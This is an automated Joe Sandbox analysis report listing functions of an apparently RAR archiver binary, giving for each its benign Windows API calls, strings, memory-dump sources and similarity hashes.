Opcode ID: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
Instruction ID: 9724eabc0c25a443c916167da472e6c6f0296d8cd4b6934b75cfe14735c309ba
Opcode Fuzzy Hash: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
Instruction Fuzzy Hash: AA217121E0C7A2C1F660BF12A840529B6A4BB58FE0F8C4135DA9E27B94DFBDD4518314

Function 00007FF74EE91C74 Relevance: 6.1, APIs: 4, Instructions: 55fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(?,?,?,?,?,00007FF74EE921A7,00000000,00000028,?,00007FF74EE87792), ref: 00007FF74EE91C97
ReadFile.KERNELBASE ref: 00007FF74EE91CB6
GetLastError.KERNEL32 ref: 00007FF74EE91CEA
GetLastError.KERNEL32 ref: 00007FF74EE91D08

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 3b78d4ed6aa6b5a120351a24eca7d2297273107fe5a6a7e720e5693830f3c1e4
Instruction ID: b9623e230f643df866c4414e33bc786d2a88990d1fa7c0998361e7f7f05ede17
Opcode Fuzzy Hash: 3b78d4ed6aa6b5a120351a24eca7d2297273107fe5a6a7e720e5693830f3c1e4
Instruction Fuzzy Hash: 16219321E0C676C1FA64BB25E400339E3E4BF42BB5F914631E95D476C8CFAED8808761

Function 00007FF74EE849F8 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 205COMMON

Download Yara Rule

Strings

default.sfx, xrefs: 00007FF74EE84AB0
AFUM, xrefs: 00007FF74EE84B8C

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID:
String ID: AFUM$default.sfx
API String ID: 0-2491287583
Opcode ID: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
Instruction ID: e0a86df632fce71fe9ef24f35d062e855bc626ef06f293887f715131e0da3a2d
Opcode Fuzzy Hash: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
Instruction Fuzzy Hash: 1981AF22A0C6F2C0FB70BB1191402BDA2A4FF517A4FC48135DA8D476D6EFADA985C730

Function 00007FF74EED65BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FF74EED662E
GetFileType.KERNELBASE ref: 00007FF74EED6644

Strings

@, xrefs: 00007FF74EED666F

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: FileHandleType
String ID: @
API String ID: 3000768030-2766056989
Opcode ID: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
Instruction ID: 6fbc5cc393e89eb64981810d2dc455d56084efbf45a9bbb95ff7b58bb9009dc0
Opcode Fuzzy Hash: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
Instruction Fuzzy Hash: B721F462A0C763C0FB60BB24A490439A650FB45730F6C1736DA7E467D4CE78E881C311

Function 00007FF74EEBB9BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 00007FF74EEBB9F8
SetThreadPriority.KERNEL32 ref: 00007FF74EEBBA4E

Part of subcall function 00007FF74EE8CDA4: wcschr.LIBVCRUNTIME ref: 00007FF74EE8CE0F
Part of subcall function 00007FF74EE8CDA4: wcschr.LIBVCRUNTIME ref: 00007FF74EE8CE22

Part of subcall function 00007FF74EE8CA40: _CxxThrowException.LIBVCRUNTIME ref: 00007FF74EE8CEDE

Strings

CreateThread failed, xrefs: 00007FF74EEBBA06

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: Threadwcschr$CreateExceptionPriorityThrow
String ID: CreateThread failed
API String ID: 1217111108-3849766595
Opcode ID: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
Instruction ID: 2320bb7dcd5a2fab39d51a24e2607f5cb63b1d65dc3162ccc388600ee779e172
Opcode Fuzzy Hash: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
Instruction Fuzzy Hash: 64118F31A0CA52C6FB44FB15E8801BAB3A0FB847A4FD44131D69D07669DFBCE646C720

Function 00007FF74EEBBB80 Relevance: 4.5, APIs: 3, Instructions: 30COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,00007FF74EEBBB79), ref: 00007FF74EEBBBB9
SetEvent.KERNEL32 ref: 00007FF74EEBBBCF
LeaveCriticalSection.KERNEL32 ref: 00007FF74EEBBBD8

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: CriticalSection$EnterEventLeave
String ID:
API String ID: 3094578987-0
Opcode ID: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
Instruction ID: 78359bc5a0feac0276bb9a036ed8a56bdd4464b55e74de01a621bbc797d3be9b
Opcode Fuzzy Hash: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
Instruction Fuzzy Hash: 4CF06222A0CB56C2FA20FF15F5840B9B360FB89BB8F940230DE9D06669DF6CD6458B10

Function 00007FF74EE87B44 Relevance: 4.5, APIs: 3, Instructions: 19COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(?,?,?,00007FF74EE87A9E), ref: 00007FF74EE87B4A
GetFileType.KERNELBASE(?,?,?,00007FF74EE87A9E), ref: 00007FF74EE87B56
GetConsoleMode.KERNEL32(?,?,?,00007FF74EE87A9E), ref: 00007FF74EE87B69

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: ConsoleFileHandleModeType
String ID:
API String ID: 4141822043-0
Opcode ID: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
Instruction ID: a41e55868c52db693fa246e8a7bd1b3ad1f7dd6f1b21993e04aa77f19cd82ed2
Opcode Fuzzy Hash: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
Instruction Fuzzy Hash: 65E08C20E0C612C3FA587766A865138A352BF49BB0F801034D80F8AB50EEAC94858320

Function 00007FF74EED2488 Relevance: 4.5, APIs: 3, Instructions: 19COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF74EED246C), ref: 00007FF74EED24B0
TerminateProcess.KERNEL32(?,?,?,00007FF74EED246C), ref: 00007FF74EED24BB
ExitProcess.KERNEL32 ref: 00007FF74EED24CA

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
Instruction ID: 65b72a8c740fc5b552dc7eb6f0510826ba3d7d5eb58c839cba177ca5a259438f
Opcode Fuzzy Hash: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
Instruction Fuzzy Hash: D1E04F20B0C727C2FA44BB74988177963527F88761F445838CC1E03393CEBEA8088370

Function 00007FF74EE94044 Relevance: 3.3, APIs: 2, Instructions: 336COMMON

Download Yara Rule

APIs

OemToCharA.USER32 ref: 00007FF74EE94255
ExpandEnvironmentStringsW.KERNEL32(?,?,00000000,?,?,?,?,?,00007FF74EE76CD9), ref: 00007FF74EE9447C

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: CharEnvironmentExpandStrings
String ID:
API String ID: 4052775200-0
Opcode ID: fcc6bb39599084807c43192b89aab19ff5ae85cc802a468cbb490d5049967146
Instruction ID: 3c1333d3a64c8baadad4885c341cdf499603961e96675e21412b36b615d24846
Opcode Fuzzy Hash: fcc6bb39599084807c43192b89aab19ff5ae85cc802a468cbb490d5049967146
Instruction Fuzzy Hash: 38E19122A1C6A2C5FB30BB65A4801BDA7E1FB527A4F844131DB9D47AD9DFBCE481C710

Function 00007FF74EE91AF0 Relevance: 3.1, APIs: 2, Instructions: 85fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000800,?,00000000,00007FF74EE87EBE,00000000,00000000,00000000,00000000,00000007,00007FF74EE87C48), ref: 00007FF74EE91B8D
CreateFileW.KERNEL32(?,?,00000800,?,00000000,00007FF74EE87EBE,00000000,00000000,00000000,00000000,00000007,00007FF74EE87C48), ref: 00007FF74EE91BD7

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
Instruction ID: 058c4fb5ef156ac90146dfd1703cf7889e2b498178527669dd0e6835c5e06eda
Opcode Fuzzy Hash: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
Instruction Fuzzy Hash: E931F263A1C651C6F770BF24E4053A9A6A0BB41BB8F914334DAAC076C5EFBDC8858750

Function 00007FF74EE7681C Relevance: 3.1, APIs: 2, Instructions: 75COMMON

Download Yara Rule

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF74EE768AE
_CxxThrowException.LIBVCRUNTIME ref: 00007FF74EE768BF

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: ExceptionThrowstd::bad_alloc::bad_alloc
String ID:
API String ID: 932687459-0
Opcode ID: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
Instruction ID: 87adbf7a8993ab096a7f3b8e8865773ae5fd8628f13d384ad721a0de375351b4
Opcode Fuzzy Hash: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
Instruction Fuzzy Hash: DC218453908F86C2EB01EF29D5410B86360FB98B98B58A331DF9D43656EF78E5E58300

Function 00007FF74EEA915C Relevance: 3.1, APIs: 2, Instructions: 51COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FF74EEA91CA
new.LIBCMT ref: 00007FF74EEA91F2

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcd120a5c2abc7f22aede06b124c0f145b5284f270e22049442def7f6cd7490e
Instruction ID: d8df6382378d0bf7c3a70ca3a6d29ebb43190c07e1e2e762958ead6be7157d29
Opcode Fuzzy Hash: dcd120a5c2abc7f22aede06b124c0f145b5284f270e22049442def7f6cd7490e
Instruction Fuzzy Hash: D911813150DB82C1FA10BB64A5403A9F2E4FF957E0F940639DA9D077E6DEB8D4518320

Function 00007FF74EE920B4 Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,00007FF74EE922EE), ref: 00007FF74EE9211B
GetLastError.KERNEL32(?,?,?,00007FF74EE922EE), ref: 00007FF74EE92126

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
Instruction ID: 1bb34ded101149fe8bb4ed9c69ed96fa3cde1427a9b6dcd4a39865a758dd5f2e
Opcode Fuzzy Hash: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
Instruction Fuzzy Hash: D901C221A1D6A1C2FE647B26B400069B2A1BF49BB0F949230DE6D43BD5CE7CE4418710

Function 00007FF74EE87A68 Relevance: 3.0, APIs: 2, Instructions: 40COMMON

Download Yara Rule

APIs

setbuf.LIBCMT ref: 00007FF74EE87A7B

Part of subcall function 00007FF74EED2AE4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF74EED7EF3

setbuf.LIBCMT ref: 00007FF74EE87A8F

Part of subcall function 00007FF74EE87B44: GetStdHandle.KERNEL32(?,?,?,00007FF74EE87A9E), ref: 00007FF74EE87B4A
Part of subcall function 00007FF74EE87B44: GetFileType.KERNELBASE(?,?,?,00007FF74EE87A9E), ref: 00007FF74EE87B56
Part of subcall function 00007FF74EE87B44: GetConsoleMode.KERNEL32(?,?,?,00007FF74EE87A9E), ref: 00007FF74EE87B69

Part of subcall function 00007FF74EED2ABC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF74EED2AD0

Part of subcall function 00007FF74EED2B40: _invalid_parameter_noinfo.LIBCMT ref: 00007FF74EED2C1C

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: _invalid_parameter_noinfo$setbuf$ConsoleFileHandleModeType
String ID:
API String ID: 4044681568-0
Opcode ID: 4e01616fa307debef67f3bdae5e4254b32b96fa30cb3d95000aeda74735f0c5a
Instruction ID: 2563d436a4b58e9b864a1e95e7909d3ce71129fc7b9293ac9f1352d3e46091e4
Opcode Fuzzy Hash: 4e01616fa307debef67f3bdae5e4254b32b96fa30cb3d95000aeda74735f0c5a
